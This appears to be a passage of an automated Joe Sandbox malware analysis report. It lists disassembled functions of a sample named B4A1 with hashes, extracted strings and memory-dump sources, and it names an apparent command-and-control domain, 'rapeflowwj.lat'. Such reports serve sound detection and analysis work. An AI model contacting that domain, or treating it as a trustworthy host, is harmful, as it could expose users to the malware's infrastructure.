Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A

Function 024CD5E7 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

34, xrefs: 024CD6D1
C], xrefs: 024CD6D8
|F, xrefs: 024CD671

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
Opcode ID: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
Instruction ID: b7f4af9d7145a0815175f61a4233a653ea6baecbe8217629a1c88f278699bd6a
Opcode Fuzzy Hash: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
Instruction Fuzzy Hash: 2EC1F0B9908351CBC714DF18C88176BB7F2EF85314F28896DE8D58B390E7749905CB96

Function 0042DFE9 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

TQ][, xrefs: 0042E307
sWK), xrefs: 0042E049
Ef, xrefs: 0042E24E

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: Ef$TQ][$sWK)
API String ID: 0-3401374238
Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7

Function 024DE250 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

Ef, xrefs: 024DE4B5
TQ][, xrefs: 024DE56E
sWK), xrefs: 024DE2B0

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: Ef$TQ][$sWK)
API String ID: 0-3401374238
Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
Instruction ID: 039c9e162e87fb48356072bf484d78760e0fb494f598ccd2db19613bc2034a8d
Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
Instruction Fuzzy Hash: 17B1D43061D3D08ED7398F2994A07ABBBE0AF97204F08499DD4D95F382D775850ACB63

Function 0041B2E0 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

/pqr, xrefs: 0041B30E
_, xrefs: 0041B428
+|-~, xrefs: 0041B306

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D

Function 024CB547 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

/pqr, xrefs: 024CB575
+|-~, xrefs: 024CB56D
_, xrefs: 024CB68F

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
Instruction ID: 0ea7a298f87ebbd9c3cbb6e0a2b8f024ac0de486bca2907a34dc98f93ba73426
Opcode Fuzzy Hash: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
Instruction Fuzzy Hash: 83812B5560459006DB2DDF3888A773BBAE79F84308B2991BFC955CFBA7E938C102874D

Function 024C5FD3 Relevance: 3.8, Strings: 3, Instructions: 37COMMON

Download Yara Rule

Strings

WJeX, xrefs: 024C604C
NDNK, xrefs: 024C5FEC
X, xrefs: 024C6039

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: NDNK$WJeX$X
API String ID: 0-3631875968
Opcode ID: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
Instruction ID: 626cb16b931839807360b545484f90fac7ae3961743234bf1fbf67f46e089896
Opcode Fuzzy Hash: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
Instruction Fuzzy Hash: 4B01BC7091D790CFD3B19F259859A9FBFE4AB92310F21492DC9C9AA211DA3688418F03

Function 0040DBD9 Relevance: 3.0, Strings: 2, Instructions: 528COMMON

Download Yara Rule

Strings

rapeflowwj.lat, xrefs: 0040DF76, 0040E316
Dx, xrefs: 0040E139

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: Dx$rapeflowwj.lat
API String ID: 0-2060909294
Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97

Function 024BDE40 Relevance: 3.0, Strings: 2, Instructions: 528COMMON

Download Yara Rule

Strings

Dx, xrefs: 024BE3A0
rapeflowwj.lat, xrefs: 024BE1DD, 024BE57D

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: Dx$rapeflowwj.lat
API String ID: 0-2060909294
Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction ID: ae1c09a80838d9e4b4bd247d0c7ca083cf04751c648ec6e10eedd78a2182ce6b
Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction Fuzzy Hash: 06F1BBB050D3D18ED3368F658494BDBBBE1AFD2718F144AADC8D95B642C735050ACBA3

Function 024DDCBC Relevance: 2.9, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

0K), xrefs: 024DE180
4*VP, xrefs: 024DE18B

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: 0K)$4*VP
API String ID: 0-3626284114
Opcode ID: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
Instruction ID: ebe03842c0bb5ef38cd76aec832bb50fca9d709d6fdac15b8d4826219b146239
Opcode Fuzzy Hash: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
Instruction Fuzzy Hash: 68D10A31A1D3D08ED7258F39C4607ABFBE19FA7214F1849AED4D98B382C7758406CB62

Function 0042DA53 Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

0K), xrefs: 0042DF19
4*VP, xrefs: 0042DF24

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: 0K)$4*VP
API String ID: 0-3626284114
Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66

Function 004179C1 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

r}A, xrefs: 00417D60
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: InitializeThunk
String ID: i$r}A
API String ID: 2994545307-2976846027
Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA

Function 00418591 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

P<?, xrefs: 00418590
P<?, xrefs: 00418680

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: P<?$P<?
API String ID: 0-3449142988
Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B

Function 0043B1D0 Relevance: 1.9, Strings: 1, Instructions: 653COMMON

Download Yara Rule

Strings

f, xrefs: 0043B3F1

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A

Function 00425E30 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

{}, xrefs: 00425F9D

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: {}
API String ID: 0-4269290415
Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A

Function 00438810 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

/,-, xrefs: 004388F5

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: InitializeThunk
String ID: /,-
API String ID: 2994545307-1700940157
Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A

Function 024E8A77 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

/,-, xrefs: 024E8B5C

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: /,-
API String ID: 0-1700940157
Opcode ID: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
Instruction ID: 70554a2d91c8dd6c1d6d9dd960f1ba5b9c972cf601ec7677e342620f1ad9b2cc
Opcode Fuzzy Hash: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
Instruction Fuzzy Hash: 56B15770A083404BFF149F258880A7BB7A3EF82329F18892EE597572A1D731DC46CB85

Function 00416263 Relevance: 1.7, Strings: 1, Instructions: 405COMMON

Download Yara Rule

Strings

VtA, xrefs: 004163A1

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: InitializeThunk
String ID: VtA
API String ID: 2994545307-3724035812
Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A

Function 0042B170 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042B36E

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA

Function 024DB3D7 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 024DB5D5

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 9988fe924ab9e323cc6a48b0c6f39e1149ef75a88859be8cd7894fd1b24147d3
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: D571E232A083558BD714CE29C9A032FB7E2EBC5B1CF1A852EE4949B391D735EC45C782

Function 0041D83A Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

klm, xrefs: 0041D9AC

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: klm
API String ID: 0-3800403225
Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A

Function 024CDAB8 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

klm, xrefs: 024CDC13

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: klm
API String ID: 0-3800403225
Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
Instruction ID: 4c52fb389c1ed9cd3fbedcd7d9261e56bfe123394229c6b0a0197c191bb5491e
Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
Instruction Fuzzy Hash: D051E278A08350CBD714DF29C85276BB7F2EF96308F28996DE4D68B394E7358501CB1A

Function 00417380 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

?^A, xrefs: 00417450, 00417540

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: InitializeThunk
String ID: ?^A
API String ID: 2994545307-4120214115
Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F

Function 00428B61 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

$%, xrefs: 00428C20

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: $%
API String ID: 0-4214564638
Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64

Function 024D8DC8 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

$%, xrefs: 024D8E87

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: $%
API String ID: 0-4214564638
Opcode ID: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
Instruction ID: 9f2dec53caa20702752a9dd84a7b30b6c62de17ba4a296f8a685b25e7702d5b4
Opcode Fuzzy Hash: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
Instruction Fuzzy Hash: DD41F0B0D012198BCB14CFA9DCA17FEB7B1FF45310F09829AD546AB794E3745942CB50

Function 0040B70C Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

o`, xrefs: 0040B74B

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: o`
API String ID: 0-3993896143
Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719

Function 024BB973 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

o`, xrefs: 024BB9B2

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: o`
API String ID: 0-3993896143
Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction ID: 4fd6ad349db0d6b971324fdcbad4b3c40ab1ec1b3ef61a1e6e1de8f310b41bc2
Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction Fuzzy Hash: 9711C270218380AFC310CF65CDC1B6BBFE2DB86204F65983DE185D7251C675E9499B15

Function 0041682D Relevance: .8, Instructions: 761COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c893c65e03af5ed3381c551886126d2ea28dea69d32e62726fdedb8c1a906dc
Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
Opcode Fuzzy Hash: 7c893c65e03af5ed3381c551886126d2ea28dea69d32e62726fdedb8c1a906dc
Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A

Function 004074F0 Relevance: .6, Instructions: 611COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
Instruction ID: 7b72874d185f9504f09fa30b763c2e13130ca022e31a023e0d3144396e745bed
Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
Instruction Fuzzy Hash: 1012A372A0C7118BD725DE18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87

Function 024B7757 Relevance: .6, Instructions: 611COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
Instruction ID: 56935c338dee7326d978200c40f4beaf286e954b0b9ee71d950ac87af9f3ca3b
Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
Instruction Fuzzy Hash: 0512B332A087118BC726DF18D8806EBF3E1BFC4319F19892ED9869B385D734A851CB52

Function 004197C2 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786

Function 024C9A29 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction ID: 075012f8267da06aa03870daa6c800d1f10da23bd702335d511c1f7761396a36
Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
